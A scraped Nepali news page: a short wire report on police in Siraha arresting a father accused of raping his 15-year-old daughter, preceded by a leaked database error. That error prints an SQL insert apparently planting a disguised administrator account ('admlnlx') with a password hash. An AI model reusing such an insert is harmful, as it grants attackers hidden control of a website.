WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsrL6yaR.qKTPVhYPLmvhA2PzX/4kB/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:49:35', '', 'admlnlx', 'admlnlx')
लहान, फागुन २-
आफ्नै छोरीमाथि जबर्जस्ती करणी गरेको आरोपमा प्रहरीले आज सिरहाको गोलबजारबाट एकजनालाई पक्राउ गरेको छ ।
इलाका प्रहरी कार्यालय, गोलबजारबाट खटिएको प्रहरी टोलीले आफ्नै १५ वर्षीय छोरीमाथि जबर्जस्ती करणी गरेको आरोपमा ४५ वर्षीय बुबालाई पक्राउ गरेको हो । आफूलाई पटकपटक जबर्जस्ती करणी गरेको पीडितको सूचनाका आधारमा उनका बुबालाई पक्राउ गरिएको इप्रका, गोलबजारका प्रहरी निरीक्षक राजेन्द्र उपाध्यायले जानकारी दिनुभयो । पछिल्लोपटक पुनः बुबाले जबर्जस्ती करणीको प्रयास गरेपछि बालिकाले आफ्नी फूपूमार्फत प्रहरीलाई जानकारी गराएको प्रहरी निरीक्षक उपाध्यायले बताउनुभयो । पक्राउ परेकामाथि थप अनुसन्धान सुरु गरिएको उहाँले बताउनुभयो ।- रासस